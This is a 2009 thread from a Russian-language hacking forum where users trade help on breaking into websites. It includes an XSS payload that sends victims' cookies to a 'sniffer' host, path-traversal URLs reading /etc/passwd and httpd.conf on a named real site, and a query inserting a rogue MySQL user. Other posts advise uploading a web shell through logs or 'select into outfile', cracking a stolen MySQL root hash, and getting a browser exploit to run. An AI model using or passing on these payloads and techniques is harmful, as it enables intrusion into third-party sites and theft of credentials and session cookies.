Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. PaCo

    PaCo Elder - Старейшина

    Joined:
    6 Feb 2008
    Messages:
    464
    Likes Received:
    139
    Reputations:
    25
    гранты с INSERT без SELECT - это изврашения и наврятли там нет SELECT грантов ибо в конструкции INSERT допустим SELECT(депенд оф версион оф корс), а насчет дампа - тут либо с помошью скрипта(программы при удаленном конекте) локально/удаленно(если разрешенно в конфиге для данного Юзера и порт ничем не прикрыт) либо если еще есть в добавок file_priv дампить в файловую систему и сливать.
     
  2. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,390
    Likes Received:
    1,209
    Reputations:
    475
    insert into mysql.user values(...)
     
  3. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    733
    Likes Received:
    646
    Reputations:
    251
    Это типо можно создать ещё одного юзера или у меня глюки o_O
    Щя посмотрю, если это так то приведу пример
    ps
    Нашёл тока
    ps2
    **** = 0000
     
    #7923 Ctacok, 7 Jul 2009
    Last edited: 7 Jul 2009
  4. PaCo

    PaCo Elder - Старейшина

    Joined:
    6 Feb 2008
    Messages:
    464
    Likes Received:
    139
    Reputations:
    25
    Угу, если прав хватит работать с mysql(если уже SELECT нету то я сомневаюмь что к mysql есть доступ).
     
  5. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,390
    Likes Received:
    1,209
    Reputations:
    475
    да да, можно юзера создать типа, а вообще проще так
    http://www.mysql.ru/docs/man/Adding_users.html
     
  6. Damned_one

    Damned_one Member

    Joined:
    24 Nov 2008
    Messages:
    14
    Likes Received:
    11
    Reputations:
    5
    Такой вопрос оч волнует - есть ограничение на ввод символов > 16 в XSS конструкции '><script>alert()</script>

    Есть ли какой-то способ втиснуться? может сервисом сокращения воспользоваться?
    Но тогда каким? И что сокращать: http://sniffer.gif?+document.cookie

    это? помогите пожалуста... мозги спарились уже
     
  7. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    733
    Likes Received:
    646
    Reputations:
    251
    Запрос метода GET или POST?
    Вааще если GET то врядтле ограничят.
    А если через POST то в инпуте есть ограничение.
    Убери его через исходник, но это если сам php скрипт непроверяет входящие данные.
     
    #7927 Ctacok, 8 Jul 2009
    Last edited: 8 Jul 2009
  8. L I G A

    L I G A Banned

    Joined:
    27 Jul 2008
    Messages:
    482
    Likes Received:
    380
    Reputations:
    49
    >>Вааще если GET то врядтле ограничят.
    бред
    PHP:
    <?php
    if($_GET['hehe'] and strlen($_GET['hehe'])<16)
    {
    echo 
    'ok';
    }else{
    exit;
    }
    ?>
    >>А если через POST то в инпуте есть ограничение.
    <input type=text name="rate" size=12 maxlength=8>
    ГЕТ или ПОСТ все равно будет ограничение

    >>Убери его через исходник, но это если сам php скрипт непроверяет входящие данные.
    сам понял что написал?
     
  9. farpost

    farpost New Member

    Joined:
    16 May 2009
    Messages:
    21
    Likes Received:
    2
    Reputations:
    1
    http://www.jedit.org/index.php?page=../../../../../../../../../../../../../../../../../../../../etc/passwd%00
    http://www.jedit.org/index.php?page=../../../../../../../../../../../../../../etc/httpd/conf/httpd.conf%00

    Возможно ли сдесь найти логи? (по стандартным путям не нашёл)
     
  10. L I G A

    L I G A Banned

    Joined:
    27 Jul 2008
    Messages:
    482
    Likes Received:
    380
    Reputations:
    49
    <SCRIPT language=javascript>
    location="твой снифер";
    </SCRIPT>
     
  11. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    958
    Likes Received:
    527
    Reputations:
    204
    На счет путей не знаю, но можно найти полный путь до сайта. В файле httpd.conf ищеть DocumentRoot... Вот он "/var/www/html"... Попробуй пути еще раз из тех, что ettee давал. Вот - http://forum.antichat.ru/thread49775.html
     
  12. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    958
    Likes Received:
    527
    Reputations:
    204
    farpost, nub-hacker, 1. Ищите логи и пробуйте залить шелл через них. 2. Пробуйте через сессии.
     
  13. DimOnOID

    DimOnOID Banned

    Joined:
    5 Dec 2006
    Messages:
    407
    Likes Received:
    126
    Reputations:
    4
    Ну неужели так трудно зайти в поиск?
    http://forum.antichat.ru/thread49775.html
     
  14. farpost

    farpost New Member

    Joined:
    16 May 2009
    Messages:
    21
    Likes Received:
    2
    Reputations:
    1
    Внизу есть вот это

    По-моему это значит что папка доступна только для 127.0.0.1. Или нет?? По крайней мере скрипты по этому пути не читаются
     
  15. AHMED HASSAN

    AHMED HASSAN New Member

    Joined:
    25 Apr 2007
    Messages:
    16
    Likes Received:
    1
    Reputations:
    0
    Hi all greets to ur amazing job here

    sorry fo my english

    but i need help with this

    now i got into site with sql inj and mysql.user table

    1-got root and pass

    what is the way to decrypt it?

    2- i got access to load_file works but i cant find my way on the server

    by load_file() doesnt got me any error

    load_file(etc/passwd) works good

    is there is any way to deal with this ????????


    thanx to u all
     
  16. geezer.code

    geezer.code Elder - Старейшина

    Joined:
    22 Jan 2007
    Messages:
    552
    Likes Received:
    358
    Reputations:
    90
    Hello,
    To decrypt(right is not "decrypt", but bruteforce ) mysql root password you can use a PasswordsPro utility from www.insidepro.com
    but under some circumbstances you won't need a mysql root password.
    If you get a pass, than you can look for phpmyadmin, or try to connect to mysql using mysql utility.
    FIrst of all, if magic_quotes_gpc option is off, you can try a "select into outfile" query, to upload a shell. to do this you should know a absolute local path. to find out the paths try to read default configs and logs with load_file() function.
    if magic_quotes_gpc option is on, try to get as much information as possible, probably that would help you(e.g. config files with ftp or other passwords).
     
    1 person likes this.
  17. Ershik

    Ershik Elder - Старейшина

    Joined:
    7 Nov 2007
    Messages:
    301
    Likes Received:
    46
    Reputations:
    6
    Сплоет заточен под Оперу. 9.63.
    http://milw0rm.com/exploits/7135

    Пытаюсь запустить через виртуалку.
    Система Windows XP. Service Pack 3.
    Браузер Opera 9.24

    Эксплоит должен вызывать калькулятор после перезаполнение буфера.
    Но никак не могу разобратся с вызовом удаленного кода(калькулятор).

    Он должен запускаться со стороны клиента, или со стороны сервера?
    Code:
    var evil = "file://";
    - пуста по умолчанию.
    Пытался выполнить как
    Code:
    var evil = "http://test.test./cals.exe";
    и
    Code:
    var evil = "file://cals.exe";
    - да толку ноль. :(
     
  18. AHMED HASSAN

    AHMED HASSAN New Member

    Joined:
    25 Apr 2007
    Messages:
    16
    Likes Received:
    1
    Reputations:
    0


    thanks for help body really appreciated
     
  19. $n@ke

    $n@ke Elder - Старейшина

    Joined:
    18 Sep 2006
    Messages:
    697
    Likes Received:
    404
    Reputations:
    134
    Ershik, во первых не cals.exe, а calc.exe
    и во вторых - может там полный путь надо или еще чо..
     
    1 person likes this.
  20. genadiez

    genadiez Member

    Joined:
    26 Dec 2008
    Messages:
    43
    Likes Received:
    16
    Reputations:
    0
    PaCo Респект

    Относительно слива БД MySQL с правами INSERT:
    PaCo
    я уже отправил тебе сообщение в личку.
    Всем остальным тоже спасибо за ответы, но прав Root у меня естественно нет! :(
    Поэтому если кто нибудь знает методы повышения привилегий пользователя (хотябы до SELECT) буду рад услышать!
     
Loading...
Thread Status:
Not open for further replies.